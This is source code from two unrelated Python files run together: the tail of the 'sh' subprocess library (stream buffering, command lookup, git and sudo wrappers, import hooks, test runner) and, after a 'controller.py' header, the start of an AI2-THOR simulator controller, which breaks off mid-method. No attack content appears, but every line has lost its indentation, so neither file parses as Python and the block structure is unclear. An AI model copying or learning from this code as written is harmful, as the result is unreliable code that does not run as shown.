class StreamWriter(object):
""" StreamWriter reads from some input (the stdin param) and writes to a fd
(the stream param). the stdin may be a Queue, a callable, something with
the "read" method, a string, or an iterable """
def __init__(self, log, stream, stdin, bufsize_type, encoding, tty_in):
self.stream = stream
self.stdin = stdin
self.log = log
self.encoding = encoding
self.tty_in = tty_in
self.stream_bufferer = StreamBufferer(bufsize_type, self.encoding)
self.get_chunk, log_msg = determine_how_to_read_input(stdin)
self.log.debug("parsed stdin as a %s", log_msg)
def fileno(self):
""" defining this allows us to do poll on an instance of this
class """
return self.stream
def write(self):
""" attempt to get a chunk of data to write to our child process's
stdin, then write it. the return value answers the question "are we
done writing forever?" """
# get_chunk may sometimes return bytes, and sometimes return strings
# because of the nature of the different types of STDIN objects we
# support
try:
chunk = self.get_chunk()
if chunk is None:
raise DoneReadingForever
except DoneReadingForever:
self.log.debug("done reading")
if self.tty_in:
# EOF time
try:
char = termios.tcgetattr(self.stream)[6][termios.VEOF]
except:
char = chr(4).encode()
# normally, one EOF should be enough to signal to a program
# that is read()ing, to return 0 and be on your way. however,
# some programs are misbehaved, like python3.1 and python3.2.
# they don't stop reading sometimes after read() returns 0.
# this can be demonstrated with the following program:
#
# import sys
# sys.stdout.write(sys.stdin.read())
#
# then type 'a' followed by ctrl-d 3 times. in python
# 2.6,2.7,3.3,3.4,3.5,3.6, it only takes 2 ctrl-d to terminate.
# however, in python 3.1 and 3.2, it takes all 3.
#
# so here we send an extra EOF along, just in case. i don't
# believe it can hurt anything
os.write(self.stream, char)
os.write(self.stream, char)
return True
except NotYetReadyToRead:
self.log.debug("received no data")
return False
# if we're not bytes, make us bytes
if IS_PY3 and hasattr(chunk, "encode"):
chunk = chunk.encode(self.encoding)
for proc_chunk in self.stream_bufferer.process(chunk):
self.log.debug("got chunk size %d: %r", len(proc_chunk),
proc_chunk[:30])
self.log.debug("writing chunk to process")
try:
os.write(self.stream, proc_chunk)
except OSError:
self.log.debug("OSError writing stdin chunk")
return True
def close(self):
self.log.debug("closing, but flushing first")
chunk = self.stream_bufferer.flush()
self.log.debug("got chunk size %d to flush: %r", len(chunk), chunk[:30])
try:
if chunk:
os.write(self.stream, chunk)
except OSError:
pass
os.close(self.stream)
def determine_how_to_feed_output(handler, encoding, decode_errors):
if callable(handler):
process, finish = get_callback_chunk_consumer(handler, encoding,
decode_errors)
# in py3, this is used for bytes
elif isinstance(handler, (cStringIO, iocStringIO)):
process, finish = get_cstringio_chunk_consumer(handler)
# in py3, this is used for unicode
elif isinstance(handler, (StringIO, ioStringIO)):
process, finish = get_stringio_chunk_consumer(handler, encoding,
decode_errors)
elif hasattr(handler, "write"):
process, finish = get_file_chunk_consumer(handler)
else:
try:
handler = int(handler)
except (ValueError, TypeError):
process = lambda chunk: False
finish = lambda: None
else:
process, finish = get_fd_chunk_consumer(handler)
return process, finish
def get_fd_chunk_consumer(handler):
handler = fdopen(handler, "w", closefd=False)
return get_file_chunk_consumer(handler)
def get_file_chunk_consumer(handler):
encode = lambda chunk: chunk
if getattr(handler, "encoding", None):
encode = lambda chunk: chunk.decode(handler.encoding)
flush = lambda: None
if hasattr(handler, "flush"):
flush = handler.flush
def process(chunk):
handler.write(encode(chunk))
# we should flush on an fd. chunk is already the correctly-buffered
# size, so we don't need the fd buffering as well
flush()
return False
def finish():
flush()
return process, finish
def get_callback_chunk_consumer(handler, encoding, decode_errors):
def process(chunk):
# try to use the encoding first, if that doesn't work, send
# the bytes, because it might be binary
try:
chunk = chunk.decode(encoding, decode_errors)
except UnicodeDecodeError:
pass
return handler(chunk)
def finish():
pass
return process, finish
def get_cstringio_chunk_consumer(handler):
def process(chunk):
handler.write(chunk)
return False
def finish():
pass
return process, finish
def get_stringio_chunk_consumer(handler, encoding, decode_errors):
def process(chunk):
handler.write(chunk.decode(encoding, decode_errors))
return False
def finish():
pass
return process, finish
class StreamReader(object):
""" reads from some output (the stream) and sends what it just read to the
handler. """
def __init__(self, log, stream, handler, buffer, bufsize_type, encoding,
decode_errors, pipe_queue=None, save_data=True):
self.stream = stream
self.buffer = buffer
self.save_data = save_data
self.encoding = encoding
self.decode_errors = decode_errors
self.pipe_queue = None
if pipe_queue:
self.pipe_queue = weakref.ref(pipe_queue)
self.log = log
self.stream_bufferer = StreamBufferer(bufsize_type, self.encoding,
self.decode_errors)
self.bufsize = bufsize_type_to_bufsize(bufsize_type)
self.process_chunk, self.finish_chunk_processor = \
determine_how_to_feed_output(handler, encoding, decode_errors)
self.should_quit = False
def fileno(self):
""" defining this allows us to do poll on an instance of this
class """
return self.stream
def close(self):
chunk = self.stream_bufferer.flush()
self.log.debug("got chunk size %d to flush: %r", len(chunk), chunk[:30])
if chunk:
self.write_chunk(chunk)
self.finish_chunk_processor()
if self.pipe_queue and self.save_data:
self.pipe_queue().put(None)
os.close(self.stream)
def write_chunk(self, chunk):
# in PY3, the chunk coming in will be bytes, so keep that in mind
if not self.should_quit:
self.should_quit = self.process_chunk(chunk)
if self.save_data:
self.buffer.append(chunk)
if self.pipe_queue:
self.log.debug("putting chunk onto pipe: %r", chunk[:30])
self.pipe_queue().put(chunk)
def read(self):
# if we're PY3, we're reading bytes, otherwise we're reading
# str
try:
chunk = no_interrupt(os.read, self.stream, self.bufsize)
except OSError as e:
self.log.debug("got errno %d, done reading", e.errno)
return True
if not chunk:
self.log.debug("got no chunk, done reading")
return True
self.log.debug("got chunk size %d: %r", len(chunk), chunk[:30])
for chunk in self.stream_bufferer.process(chunk):
self.write_chunk(chunk)
class StreamBufferer(object):
""" this is used for feeding in chunks of stdout/stderr, and breaking it up
into chunks that will actually be put into the internal buffers. for
example, if you have two processes, one being piped to the other, and you
want that first process to feed lines of data (instead of the chunks
however they come in), OProc will use an instance of this class to chop up
the data and feed it as lines to be sent down the pipe """
def __init__(self, buffer_type, encoding=DEFAULT_ENCODING,
decode_errors="strict"):
# 0 for unbuffered, 1 for line, everything else for that amount
self.type = buffer_type
self.buffer = []
self.n_buffer_count = 0
self.encoding = encoding
self.decode_errors = decode_errors
# this is for if we change buffering types. if we change from line
# buffered to unbuffered, it's very possible that our self.buffer list
# has data that was being saved up (while we searched for a newline).
# we need to use that up, so we don't lose it
self._use_up_buffer_first = False
# the buffering lock is used because we might change the buffering
# types from a different thread. for example, if we have a stdout
# callback, we might use it to change the way stdin buffers. so we
# lock
self._buffering_lock = threading.RLock()
self.log = Logger("stream_bufferer")
def change_buffering(self, new_type):
# TODO, when we stop supporting 2.6, make this a with context
self.log.debug("acquiring buffering lock for changing buffering")
self._buffering_lock.acquire()
self.log.debug("got buffering lock for changing buffering")
try:
if new_type == 0:
self._use_up_buffer_first = True
self.type = new_type
finally:
self._buffering_lock.release()
self.log.debug("released buffering lock for changing buffering")
def process(self, chunk):
# MAKE SURE THAT THE INPUT IS PY3 BYTES
# THE OUTPUT IS ALWAYS PY3 BYTES
# TODO, when we stop supporting 2.6, make this a with context
self.log.debug("acquiring buffering lock to process chunk (buffering: %d)", self.type)
self._buffering_lock.acquire()
self.log.debug("got buffering lock to process chunk (buffering: %d)", self.type)
try:
# unbuffered
if self.type == 0:
if self._use_up_buffer_first:
self._use_up_buffer_first = False
to_write = self.buffer
self.buffer = []
to_write.append(chunk)
return to_write
return [chunk]
# line buffered
elif self.type == 1:
total_to_write = []
nl = "\n".encode(self.encoding)
while True:
newline = chunk.find(nl)
if newline == -1:
break
chunk_to_write = chunk[:newline + 1]
if self.buffer:
chunk_to_write = b"".join(self.buffer) + chunk_to_write
self.buffer = []
self.n_buffer_count = 0
chunk = chunk[newline + 1:]
total_to_write.append(chunk_to_write)
if chunk:
self.buffer.append(chunk)
self.n_buffer_count += len(chunk)
return total_to_write
# N size buffered
else:
total_to_write = []
while True:
overage = self.n_buffer_count + len(chunk) - self.type
if overage >= 0:
ret = "".encode(self.encoding).join(self.buffer) + chunk
chunk_to_write = ret[:self.type]
chunk = ret[self.type:]
total_to_write.append(chunk_to_write)
self.buffer = []
self.n_buffer_count = 0
else:
self.buffer.append(chunk)
self.n_buffer_count += len(chunk)
break
return total_to_write
finally:
self._buffering_lock.release()
self.log.debug("released buffering lock for processing chunk (buffering: %d)", self.type)
def flush(self):
self.log.debug("acquiring buffering lock for flushing buffer")
self._buffering_lock.acquire()
self.log.debug("got buffering lock for flushing buffer")
try:
ret = "".encode(self.encoding).join(self.buffer)
self.buffer = []
return ret
finally:
self._buffering_lock.release()
self.log.debug("released buffering lock for flushing buffer")
def with_lock(lock):
def wrapped(fn):
fn = contextmanager(fn)
@contextmanager
def wrapped2(*args, **kwargs):
with lock:
with fn(*args, **kwargs):
yield
return wrapped2
return wrapped
@with_lock(PUSHD_LOCK)
def pushd(path):
""" pushd changes the actual working directory for the duration of the
context, unlike the _cwd arg this will work with other built-ins such as
sh.glob correctly """
orig_path = os.getcwd()
os.chdir(path)
try:
yield
finally:
os.chdir(orig_path)
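# hypothetical usage of the pushd context manager defined above:
#
#   import sh
#   with sh.pushd("/tmp"):
#       sh.ls()             # runs with /tmp as the real working directory
#       sh.glob("*.log")    # built-ins like sh.glob also see the new cwd
#   # the original working directory is restored on exit, even after an error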
@contextmanager
def args(**kwargs):
""" allows us to temporarily override all the special keyword parameters in
a with context """
kwargs_str = ",".join(["%s=%r" % (k,v) for k,v in kwargs.items()])
raise DeprecationWarning("""
sh.args() has been deprecated because it was never thread safe. use the
following instead:
sh2 = sh({kwargs})
sh2.your_command()
or
sh2 = sh({kwargs})
from sh2 import your_command
your_command()
""".format(kwargs=kwargs_str))
class Environment(dict):
""" this allows lookups to names that aren't found in the global scope to be
searched for as a program name. for example, if "ls" isn't found in this
module's scope, we consider it a system program and try to find it.
we use a dict instead of just a regular object as the base class because the
exec() statement used in the run_repl requires the "globals" argument to be a
dictionary """
# this is a list of all of the names that the sh module exports that will
# not resolve to functions. we don't want to accidentally shadow real
# commands with functions/imports that we define in sh.py. for example,
# "import time" may override the time system program
whitelist = set([
"Command",
"RunningCommand",
"CommandNotFound",
"DEFAULT_ENCODING",
"DoneReadingForever",
"ErrorReturnCode",
"NotYetReadyToRead",
"SignalException",
"ForkException",
"TimeoutException",
"__project_url__",
"__version__",
"__file__",
"args",
"pushd",
"glob",
"contrib",
])
def __init__(self, globs, baked_args={}):
""" baked_args are defaults for the 'sh' execution context. for
example:
tmp = sh(_out=StringIO())
'out' would end up in here as an entry in the baked_args dict """
self.globs = globs
self.baked_args = baked_args
self.disable_whitelist = False
def __getitem__(self, k):
# if we first import "_disable_whitelist" from sh, we can import
# anything defined in the global scope of sh.py. this is useful for our
# tests
if k == "_disable_whitelist":
self.disable_whitelist = True
return None
# we're trying to import something real (maybe), see if it's in our
# global scope
if k in self.whitelist or self.disable_whitelist:
return self.globs[k]
# somebody tried to be funny and do "from sh import *"
if k == "__all__":
warnings.warn("Cannot import * from sh. Please import sh or import programs individually.")
return []
# check if we're naming a dynamically generated ReturnCode exception
exc = get_exc_from_name(k)
if exc:
return exc
# https://github.com/ipython/ipython/issues/2577
# https://github.com/amoffat/sh/issues/97#issuecomment-10610629
if k.startswith("__") and k.endswith("__"):
raise AttributeError
# is it a custom builtin?
builtin = getattr(self, "b_" + k, None)
if builtin:
return builtin
# is it a command?
cmd = resolve_command(k, self.baked_args)
if cmd:
return cmd
# how about an environment variable?
# this check must come after testing if its a command, because on some
# systems, there are environment variables that can conflict with
# command names.
# https://github.com/amoffat/sh/issues/238
try:
return os.environ[k]
except KeyError:
pass
# nothing found, raise an exception
raise CommandNotFound(k)
# methods that begin with "b_" are custom builtins and will override any
# program that exists in our path. this is useful for things like
# common shell builtins that people are used to, but which aren't actually
# full-fledged system binaries
def b_cd(self, path=None):
if path:
os.chdir(path)
else:
os.chdir(os.path.expanduser('~'))
def b_which(self, program, paths=None):
return which(program, paths)
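# illustrative sketch of the lookup order implemented by
# Environment.__getitem__: whitelist, ReturnCode exceptions, "b_" builtins,
# PATH commands, then environment variables.
#
#   env = Environment(globals())
#   env["Command"]       # whitelisted module-level name
#   env["cd"]            # resolves to the b_cd builtin above
#   env["ls"]            # resolved from PATH via resolve_command
#   env["HOME"]          # no such command, falls through to os.environ
#   env["no_such_cmd"]   # raises CommandNotFound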
class Contrib(ModuleType): # pragma: no cover
@classmethod
def __call__(cls, name):
def wrapper1(fn):
@property
def cmd_getter(self):
cmd = resolve_command(name)
if not cmd:
raise CommandNotFound(name)
new_cmd = fn(cmd)
return new_cmd
setattr(cls, name, cmd_getter)
return fn
return wrapper1
mod_name = __name__ + ".contrib"
contrib = Contrib(mod_name)
sys.modules[mod_name] = contrib
@contrib("git")
def git(orig): # pragma: no cover
""" most git commands play nicer without a TTY """
cmd = orig.bake(_tty_out=False)
return cmd
@contrib("sudo")
def sudo(orig): # pragma: no cover
""" a nicer version of sudo that uses getpass to ask for a password, or
allows the first argument to be a string password """
prompt = "[sudo] password for %s: " % getpass.getuser()
def stdin():
pw = getpass.getpass(prompt=prompt) + "\n"
yield pw
def process(args, kwargs):
password = kwargs.pop("password", None)
if password is None:
pass_getter = stdin()
else:
pass_getter = password.rstrip("\n") + "\n"
kwargs["_in"] = pass_getter
return args, kwargs
cmd = orig.bake("-S", _arg_preprocess=process)
return cmd
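# illustrative use of the contrib commands registered above; these sketches
# assume the git and sudo binaries exist on the system:
#
#   from sh.contrib import git, sudo
#   print(git("status"))                  # git baked with _tty_out=False
#   sudo("whoami", password="secret")     # password is fed to `sudo -S` on stdin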
def run_repl(env): # pragma: no cover
banner = "\n>> sh v{version}\n>> https://github.com/amoffat/sh\n"
print(banner.format(version=__version__))
while True:
try:
line = raw_input("sh> ")
except (ValueError, EOFError):
break
try:
exec(compile(line, "<dummy>", "single"), env, env)
except SystemExit:
break
except:
print(traceback.format_exc())
# cleans up our last line
print("")
# this is a thin wrapper around THIS module (we patch sys.modules[__name__]).
# this is in the case that the user does a "from sh import whatever"
# in other words, they only want to import certain programs, not the whole
# system PATH worth of commands. in this case, we just proxy the
# import lookup to our Environment class
class SelfWrapper(ModuleType):
def __init__(self, self_module, baked_args={}):
# this is super ugly to have to copy attributes like this,
# but it seems to be the only way to make reload() behave
# nicely. if i make these attributes dynamic lookups in
# __getattr__, reload sometimes chokes in weird ways...
for attr in ["__builtins__", "__doc__", "__file__", "__name__", "__package__"]:
setattr(self, attr, getattr(self_module, attr, None))
# python 3.2 (2.7 and 3.3 work fine) breaks on osx (not ubuntu)
# if we set this to None. and 3.3 needs a value for __path__
self.__path__ = []
self.__self_module = self_module
self.__env = Environment(globals(), baked_args=baked_args)
def __getattr__(self, name):
return self.__env[name]
def __call__(self, **kwargs):
""" returns a new SelfWrapper object, where all commands spawned from it
have the baked_args kwargs set on them by default """
baked_args = self.__env.baked_args.copy()
baked_args.update(kwargs)
new_mod = self.__class__(self.__self_module, baked_args)
# inspect the line in the parent frame that calls and assigns the new sh
# variable, and get the name of the new variable we're assigning to.
# this is very brittle and pretty much a sin. but it works 99% of
# the time and the tests pass
#
# the reason we need to do this is because we need to remove the old
# cached module from sys.modules. if we don't, it gets re-used, and any
# old baked params get used, which is not what we want
parent = inspect.stack()[1]
code = parent[4][0].strip()
parsed = ast.parse(code)
module_name = parsed.body[0].targets[0].id
if module_name == __name__:
raise RuntimeError("Cannot use the name 'sh' as an execution context")
sys.modules.pop(module_name, None)
return new_mod
def in_importlib(frame):
""" helper for checking if a filename is in importlib guts """
return frame.f_code.co_filename == "<frozen importlib._bootstrap>"
def register_importer():
""" registers our fancy importer that can let us import from a module name,
like:
import sh
tmp = sh()
from tmp import ls
"""
def test(importer):
return importer.__class__.__name__ == ModuleImporterFromVariables.__name__
already_registered = any([True for i in sys.meta_path if test(i)])
if not already_registered:
importer = ModuleImporterFromVariables(
restrict_to=["SelfWrapper"],
)
sys.meta_path.insert(0, importer)
return not already_registered
def fetch_module_from_frame(name, frame):
mod = frame.f_locals.get(name, frame.f_globals.get(name, None))
return mod
class ModuleImporterFromVariables(object):
""" a fancy importer that allows us to import from a variable that was
recently set in either the local or global scope, like this:
sh2 = sh(_timeout=3)
from sh2 import ls
"""
def __init__(self, restrict_to=None):
self.restrict_to = set(restrict_to or set())
def find_module(self, mod_fullname, path=None):
""" mod_fullname doubles as the name of the VARIABLE holding our new sh
context. for example:
derp = sh()
from derp import ls
here, mod_fullname will be "derp". keep that in mind as we go through
the rest of this function """
parent_frame = inspect.currentframe().f_back
while in_importlib(parent_frame):
parent_frame = parent_frame.f_back
# this line is saying "hey, does mod_fullname exist as a name we've
# defined previously?" the purpose of this is to ensure that
# mod_fullname is really a thing we've defined. if we haven't defined
# it before, then we "can't" import from it
module = fetch_module_from_frame(mod_fullname, parent_frame)
if not module:
return None
# make sure it's a class we're allowed to import from
if module.__class__.__name__ not in self.restrict_to:
return None
return self
def load_module(self, mod_fullname):
parent_frame = inspect.currentframe().f_back
while in_importlib(parent_frame):
parent_frame = parent_frame.f_back
module = fetch_module_from_frame(mod_fullname, parent_frame)
# we HAVE to include the module in sys.modules, per the import PEP.
# older versions of python were more lenient about this being set, but
# not in >= python3.3, unfortunately. this requirement necessitates the
# ugly code in SelfWrapper.__call__
sys.modules[mod_fullname] = module
module.__loader__ = self
return module
def run_tests(env, locale, args, version, force_select, **extra_env): # pragma: no cover
py_version = "python"
py_version += str(version)
py_bin = which(py_version)
return_code = None
poller = "poll"
if force_select:
poller = "select"
if py_bin:
print("Testing %s, locale %r, poller: %s" % (py_version.capitalize(),
locale, poller))
env["SH_TESTS_USE_SELECT"] = str(int(force_select))
env["LANG"] = locale
for k,v in extra_env.items():
env[k] = str(v)
cmd = [py_bin, "-W", "ignore", os.path.join(THIS_DIR, "test.py")] + args[1:]
print("Running %r" % cmd)
launch = lambda: os.spawnve(os.P_WAIT, cmd[0], cmd, env)
return_code = launch()
return return_code
# we're being run as a stand-alone script
if __name__ == "__main__": # pragma: no cover
def parse_args():
from optparse import OptionParser
parser = OptionParser()
parser.add_option("-e", "--envs", dest="envs", action="append")
parser.add_option("-l", "--locales", dest="constrain_locales", action="append")
options, args = parser.parse_args()
envs = options.envs or []
constrain_locales = options.constrain_locales or []
return args, envs, constrain_locales
# these restrict which python versions (envs) and locales the tests run
# against. if they're empty lists, all available ones are used
args, constrain_versions, constrain_locales = parse_args()
action = None
if args:
action = args[0]
if action in ("test", "travis", "tox"):
import test
coverage = None
if test.HAS_UNICODE_LITERAL:
import coverage
env = os.environ.copy()
env["SH_TESTS_RUNNING"] = "1"
if coverage:
test.append_module_path(env, coverage)
# if we're testing locally, run all versions of python on the system
if action == "test":
all_versions = ("2.6", "2.7", "3.1", "3.2", "3.3", "3.4", "3.5", "3.6", "3.7", "3.8")
# if we're testing on travis or tox, just use the system's default python, since travis will spawn a vm per
# python version in our .travis.yml file, and tox will run its matrix via tox.ini
elif action in ("travis", "tox"):
v = sys.version_info
sys_ver = "%d.%d" % (v[0], v[1])
all_versions = (sys_ver,)
all_force_select = [True]
if HAS_POLL:
all_force_select.append(False)
all_locales = ("en_US.UTF-8", "C")
i = 0
ran_versions = set()
for locale in all_locales:
# make sure this locale is allowed
if constrain_locales and locale not in constrain_locales:
continue
for version in all_versions:
# make sure this version is allowed
if constrain_versions and version not in constrain_versions:
continue
for force_select in all_force_select:
env_copy = env.copy()
ran_versions.add(version)
exit_code = run_tests(env_copy, locale, args, version,
force_select, SH_TEST_RUN_IDX=i)
if exit_code is None:
print("Couldn't find %s, skipping" % version)
elif exit_code != 0:
print("Failed for %s, %s" % (version, locale))
exit(1)
i += 1
print("Tested Python versions: %s" % ",".join(sorted(list(ran_versions))))
else:
env = Environment(globals())
run_repl(env)
# we're being imported from somewhere
else:
self = sys.modules[__name__]
sys.modules[__name__] = SelfWrapper(self)
register_importer()
controller.py
# Copyright Allen Institute for Artificial Intelligence 2017
"""
ai2thor.controller
Primary entrypoint into the Thor API. Provides all the high-level functions
needed to control the in-game agent through ai2thor.server.
"""
import atexit
from collections import deque, defaultdict
from itertools import product
import io
import json
import copy
import logging
import fcntl
import math
import time
import random
import shlex
import signal
import subprocess
import shutil
import threading
import os
import platform
import uuid
import tty
import sys
import termios
try:
from queue import Queue
except ImportError:
from Queue import Queue
import zipfile
import numpy as np
import ai2thor.docker
import ai2thor.downloader
import ai2thor.server
from ai2thor.server import queue_get
from ai2thor._builds import BUILDS
from ai2thor._quality_settings import QUALITY_SETTINGS, DEFAULT_QUALITY
logger = logging.getLogger(__name__)
RECEPTACLE_OBJECTS = {
'Box': {'Candle',
'CellPhone',
'Cloth',
'CreditCard',
'Dirt',
'KeyChain',
'Newspaper',
'ScrubBrush',
'SoapBar',
'SoapBottle',
'ToiletPaper'},
'Cabinet': {'Bowl',
'BowlDirty',
'Box',
'Bread',
'BreadSliced',
'ButterKnife',
'Candle',
'CellPhone',
'Cloth',
'CoffeeMachine',
'Container',
'ContainerFull',
'CreditCard',
'Cup',
'Fork',
'KeyChain',
'Knife',
'Laptop',
'Mug',
'Newspaper',
'Pan',
'Plate',
'Plunger',
'Pot',
'Potato',
'Sandwich',
'ScrubBrush',
'SoapBar',
'SoapBottle',
'Spoon',
'SprayBottle',
'Statue',
'TissueBox',
'Toaster',
'ToiletPaper',
'WateringCan'},
'CoffeeMachine': {'MugFilled', 'Mug'},
'CounterTop': {'Apple',
'AppleSlice',
'Bowl',
'BowlDirty',
'BowlFilled',
'Box',
'Bread',
'BreadSliced',
'ButterKnife',
'Candle',
'CellPhone',
'CoffeeMachine',
'Container',
'ContainerFull',
'CreditCard',
'Cup',
'Egg',
'EggFried',
'EggShell',
'Fork',
'HousePlant',
'KeyChain',
'Knife',
'Laptop',
'Lettuce',
'LettuceSliced',
'Microwave',
'Mug',
'MugFilled',
'Newspaper',
'Omelette',
'Pan',
'Plate',
'Plunger',
'Pot',
'Potato',
'PotatoSliced',
'RemoteControl',
'Sandwich',
'ScrubBrush',
'SoapBar',
'SoapBottle',
'Spoon',
'SprayBottle',
'Statue',
'Television',
'TissueBox',
'Toaster',
'ToiletPaper',
'Tomato',
'TomatoSliced',
'WateringCan'},
'Fridge': {'Apple',
'AppleSlice',
'Bowl',
'BowlDirty',
'BowlFilled',
'Bread',
'BreadSliced',
'Container',
'ContainerFull',
'Cup',
'Egg',
'EggFried',
'EggShell',
'Lettuce',
'LettuceSliced',
'Mug',
'MugFilled',
'Omelette',
'Pan',
'Plate',
'Pot',
'Potato',
'PotatoSliced',
'Sandwich',
'Tomato',
'TomatoSliced'},
'GarbageCan': {'Apple',
'AppleSlice',
'Box',
'Bread',
'BreadSliced',
'Candle',
'CellPhone',
'CreditCard',
'Egg',
'EggFried',
'EggShell',
'LettuceSliced',
'Newspaper',
'Omelette',
'Plunger',
'Potato',
'PotatoSliced',
'Sandwich',
'ScrubBrush',
'SoapBar',
'SoapBottle',
'SprayBottle',
'Statue',
'ToiletPaper',
'Tomato',
'TomatoSliced'},
'Microwave': {'Bowl',
'BowlDirty',
'BowlFilled',
'Bread',
'BreadSliced',
'Container',
'ContainerFull',
'Cup',
'Egg',
'EggFried',
'Mug',
'MugFilled',
'Omelette',
'Plate',
'Potato',
'PotatoSliced',
'Sandwich'},
'PaintingHanger': {'Painting'},
'Pan': {'Apple',
'AppleSlice',
'EggFried',
'Lettuce',
'LettuceSliced',
'Omelette',
'Potato',
'PotatoSliced',
'Tomato',
'TomatoSliced'},
'Pot': {'Apple',
'AppleSlice',
'EggFried',
'Lettuce',
'LettuceSliced',
'Omelette',
'Potato',
'PotatoSliced',
'Tomato',
'TomatoSliced'},
'Sink': {'Apple',
'AppleSlice',
'Bowl',
'BowlDirty',
'BowlFilled',
'ButterKnife',
'Container',
'ContainerFull',
'Cup',
'Egg',
'EggFried',
'EggShell',
'Fork',
'Knife',
'Lettuce',
'LettuceSliced',
'Mug',
'MugFilled',
'Omelette',
'Pan',
'Plate',
'Pot',
'Potato',
'PotatoSliced',
'Sandwich',
'ScrubBrush',
'SoapBottle',
'Spoon',
'Tomato',
'TomatoSliced',
'WateringCan'},
'StoveBurner': {'Omelette', 'Pot', 'Pan', 'EggFried'},
'TableTop': {'Apple',
'AppleSlice',
'Bowl',
'BowlDirty',
'BowlFilled',
'Box',
'Bread',
'BreadSliced',
'ButterKnife',
'Candle',
'CellPhone',
'CoffeeMachine',
'Container',
'ContainerFull',
'CreditCard',
'Cup',
'Egg',
'EggFried',
'EggShell',
'Fork',
'HousePlant',
'KeyChain',
'Knife',
'Laptop',
'Lettuce',
'LettuceSliced',
'Microwave',
'Mug',
'MugFilled',
'Newspaper',
'Omelette',
'Pan',
'Plate',
'Plunger',
'Pot',
'Potato',
'PotatoSliced',
'RemoteControl',
'Sandwich',
'ScrubBrush',
'SoapBar',
'SoapBottle',
'Spoon',
'SprayBottle',
'Statue',
'Television',
'TissueBox',
'Toaster',
'ToiletPaper',
'Tomato',
'TomatoSliced',
'WateringCan'},
'ToiletPaperHanger': {'ToiletPaper'},
'TowelHolder': {'Cloth'}}
def get_term_character():
fd = sys.stdin.fileno()
old_settings = termios.tcgetattr(fd)
try:
tty.setraw(sys.stdin.fileno())
ch = sys.stdin.read(1)
finally:
termios.tcsetattr(fd, termios.TCSADRAIN, old_settings)
return ch
def process_alive(pid):
"""
Use kill(0) to determine if pid is alive
:param pid: process id
:rtype: bool
"""
try:
os.kill(pid, 0)
except OSError:
return False
return True
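# illustrative example of the kill(0) liveness check above: signal 0 delivers
# nothing, it only asks the kernel whether the pid exists.
#
#   assert process_alive(os.getpid())
#   assert not process_alive(999999999)   # almost certainly no such pid
#
# note that EPERM (a live process owned by another user) also lands in the
# OSError branch, so this check is only reliable for processes we own.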
# python2.7 compatible makedirs
def makedirs(directory):
if not os.path.isdir(directory):
os.makedirs(directory)
def distance(point1, point2):
x_diff = (point1['x'] - point2['x']) ** 2
z_diff = (point1['z'] - point2['z']) ** 2
return math.sqrt(x_diff + z_diff)
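# distance() measures planar (x, z) separation and ignores y, e.g.:
#   distance(dict(x=0.0, y=1.0, z=0.0), dict(x=3.0, y=5.0, z=4.0))  # -> 5.0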
def key_for_point(x, z):
return "%0.1f %0.1f" % (x, z)
class Controller(object):
def __init__(self, quality=DEFAULT_QUALITY, fullscreen=False):
self.request_queue = Queue(maxsize=1)
self.response_queue = Queue(maxsize=1)
self.receptacle_nearest_pivot_points = {}
self.server = None
self.unity_pid = None
self.docker_enabled = False
self.container_id = None
self.local_executable_path = None
self.last_event = None
self.server_thread = None
self.killing_unity = False
self.quality = quality
self.lock_file = None
self.fullscreen = fullscreen
def reset(self, scene_name=None):
self.response_queue.put_nowait(dict(action='Reset', sceneName=scene_name, sequenceId=0))
self.last_event = queue_get(self.request_queue)
return self.last_event
def random_initialize(
self,
random_seed=None,
randomize_open=False,
unique_object_types=False,
exclude_receptacle_object_pairs=[],
max_num_repeats=1,
remove_prob=0.5):
receptacle_objects = []
for rec_obj_type, object_types in RECEPTACLE_OBJECTS.items():
receptacle_objects.append(
dict(receptacleObjectType=rec_obj_type, itemObjectTypes=list(object_types))
)
if random_seed is None:
random_seed = random.randint(0, 2**32)
exclude_object_ids = []
for obj in self.last_event.metadata['objects']:
pivot_points = self.receptacle_nearest_pivot_points
# don't put things in pot or pan currently
if (pivot_points and obj['receptacle'] and
pivot_points[obj['objectId']].keys()) or obj['objectType'] in ['Pot', 'Pan']:
#print("no visible pivots for receptacle %s" % o['objectId'])
exclude_object_ids.append(obj['objectId'])
return self.step(dict(
action='RandomInitialize',
receptacleObjects=receptacle_objects,
randomizeOpen=randomize_open,
uniquePickupableObjectTypes=unique_object_types,
excludeObjectIds=exclude_object_ids,
excludeReceptacleObjectPairs=exclude_receptacle_object_pairs,
maxNumRepeats=max_num_repeats,
removeProb=remove_prob,
randomSeed=random_seed))
def scene_names(self):
scenes = []
for low, high in [(1,31), (201, 231), (301, 331), (401, 431)]:
for i in range(low, high):
scenes.append('FloorPlan%s' % i)
return scenes
def unlock_release(self):
if self.lock_file:
fcntl.flock(self.lock_file, fcntl.LOCK_UN)
def lock_release(self):
build_dir = os.path.join(self.releases_dir(), self.build_name())
if os.path.isdir(build_dir):
self.lock_file = open(os.path.join(build_dir, ".lock"), "w")
fcntl.flock(self.lock_file, fcntl.LOCK_SH)
def prune_releases(self):
current_exec_path = self.executable_path()
for d in os.listdir(self.releases_dir()):
release = os.path.join(self.releases_dir(), d)
if current_exec_path.startswith(release):
continue
if os.path.isdir(release):
try:
with open(os.path.join(release, ".lock"), "w") as f:
fcntl.flock(f, fcntl.LOCK_EX | fcntl.LOCK_NB)
shutil.rmtree(release)
except Exception as e:
pass
def next_interact_command(self):
current_buffer = ''
while True:
commands = self._interact_commands
current_buffer += get_term_character()
if current_buffer == 'q' or current_buffer == '\x03':
break
if current_buffer in commands:
yield commands[current_buffer]
current_buffer = ''
else:
match = False
for k,v in commands.items():
if k.startswith(current_buffer):
match = True
break
if not match:
current_buffer = ''
def interact(self):
default_interact_commands = {
'\x1b[C': dict(action='MoveRight', moveMagnitude=0.25),
'\x1b[D': dict(action='MoveLeft', moveMagnitude=0.25),
'\x1b[A': dict(action='MoveAhead', moveMagnitude=0.25),
'\x1b[B': dict(action='MoveBack', moveMagnitude=0.25),
'\x1b[1;2A': dict(action='LookUp'),
'\x1b[1;2B': dict(action='LookDown'),
'\x1b[1;2C': dict(action='RotateRight'),
'\x1b[1;2D': dict(action='RotateLeft')
}
self._interact_commands = default_interact_commands.copy()
command_message = u"Enter a Command: Move \u2190\u2191\u2192\u2193, Rotate/Look Shift + \u2190\u2191\u2192\u2193, Quit 'q' or Ctrl-C"
print(command_message)
for a in self.next_interact_command():
new_commands = {}
command_counter = dict(counter=1)
def add_command(cc, action, **args):
if cc['counter'] < 10:
com = dict(action=action)
com.update(args)
new_commands[str(cc['counter'])] = com
cc['counter'] += 1
event = self.step(a)
# check inventory
visible_objects = []
for o in event.metadata['objects']:
